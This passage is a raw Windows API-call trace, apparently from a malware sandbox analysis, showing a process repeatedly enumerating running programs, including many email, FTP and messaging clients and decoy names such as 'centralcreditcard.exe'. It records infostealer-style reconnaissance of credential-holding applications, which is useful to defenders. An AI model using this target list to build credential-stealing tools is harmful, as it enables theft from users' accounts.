th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0109.641] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0109.643] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0109.644] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0109.646] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0109.647] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0109.649] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0109.650] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0109.651] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0109.653] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0109.654] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0109.656] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0109.658] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0109.659] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0109.661] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0109.662] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1228, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0109.663] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0109.665] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0109.666] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0109.667] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0109.669] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.670] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0109.683] CloseHandle (hObject=0x2140) returned 1 [0109.683] Sleep (dwMilliseconds=0x64) [0109.798] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2164 [0109.809] Process32First (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.810] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x82, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.812] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.814] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.816] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.817] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.819] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.820] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.822] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.824] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.825] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.827] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.829] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.831] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.832] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.834] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.835] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.836] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.837] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.839] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.840] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0109.841] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.868] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0109.870] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.872] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.873] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0109.875] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0109.877] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0109.879] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0109.880] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.881] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0109.882] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.883] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0109.885] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0109.886] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.888] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0109.889] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0109.890] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0109.892] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0109.893] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0109.894] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0109.896] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-red.exe")) returned 1 [0109.897] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="what_drive_decide.exe")) returned 1 [0109.898] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="truth-statement.exe")) returned 1 [0109.900] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="let_dark.exe")) returned 1 [0109.902] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="safe somebody.exe")) returned 1 [0109.903] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="singthatheart.exe")) returned 1 [0109.904] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="low.exe")) returned 1 [0109.905] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="apply-would.exe")) returned 1 [0109.911] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="of-official.exe")) returned 1 [0109.912] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="billion.exe")) returned 1 [0109.914] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="newsignsister.exe")) returned 1 [0109.915] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="present-agree.exe")) returned 1 [0109.916] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0109.918] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="populationread.exe")) returned 1 [0109.919] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="play-religious.exe")) returned 1 [0109.921] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="look.exe")) returned 1 [0109.922] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="love.exe")) returned 1 [0109.924] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel final.exe")) returned 1 [0109.926] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0109.928] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0109.930] Process32Next (in: 